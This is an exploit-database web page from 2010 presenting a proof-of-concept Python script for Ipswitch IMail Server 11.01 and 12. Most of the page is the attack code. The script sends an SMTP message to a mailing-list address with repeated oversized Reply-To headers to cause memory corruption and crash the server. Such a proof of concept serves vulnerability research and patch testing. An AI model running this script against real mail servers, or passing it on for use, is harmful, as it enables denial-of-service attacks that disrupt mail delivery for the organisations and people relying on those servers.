Home / os / win7

[dos / poc] - Ipswitch Imail Server List Mailer Reply-To Add

Posted on 15 September 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Ipswitch Imail Server List Mailer Reply-To Address Memory Corruption | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: dos / poc | Exploit author: Abysssec' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>====================================================================
Ipswitch Imail Server List Mailer Reply-To Address Memory Corruption
====================================================================

  Title               :  Ipswitch Imail Server List Mailer Reply-To Address memory corruption
  Version             :  Imail server v11.01 and 12
  Analysis            :  http://www.abysssec.com
  Vendor              :  http://www.ipswitch.com
  Impact              :  Critical
  Contact             :  shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter             :  @abysssec
 
&#039;&#039;&#039;
 
import smtplib
 
sender = &#039;from@fromdomain.com&#039;
receivers = [&#039;CrashList@wapteam-f556693&#039;]
 
message = &quot;&quot;&quot;From: From Person &lt;from@fromdomain.com&gt;
To: To Person &lt;CrashList@wapteam-f556693&gt;
&quot;&quot;&quot;
#ReplayCount = 5
#while ReplayCount&gt;0:
#   message = message + &quot;Reply-To:&quot;
counter = 3
while counter&gt;0:
#   if counter != 50000 :
#      message = message + &quot;,&quot;
   #message = message + &quot;Reply-To: &lt;someone&quot;+str(counter)+&quot;@example.org&gt;&quot;
   message = message + &quot;Reply-To: &quot;+(&quot;A&quot;*200)+&quot;a&quot;*4+&quot;B&quot;*196+&quot;@exam.com&quot;
   counter = counter - 1
   message = message + &quot;
&quot;
#   ReplayCount = ReplayCount - 1
    
#message = message + &quot;
&quot;
message = message + &quot;&quot;&quot;
Subject: SMTP e-mail test
 
This is a test e-mail message.
 
&quot;&quot;&quot;
#print message 
#fp = open(&quot;C:\Program Files\Ipswitch\IMail\spool\tmp188.tmp&quot;,&quot;w&quot;)
#fp.write(message)
#fp.close()
#print &quot;wrote&quot;
try:
   smtpObj = smtplib.SMTP(&#039;localhost&#039;)
   smtpObj.sendmail(sender, receivers, message)        
   print &quot;Successfully sent email&quot;
except SMTPException:
   print &quot;Error: unable to send email&quot;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-15]</pre></body></html>

 

TOP

Malware :

Exploits :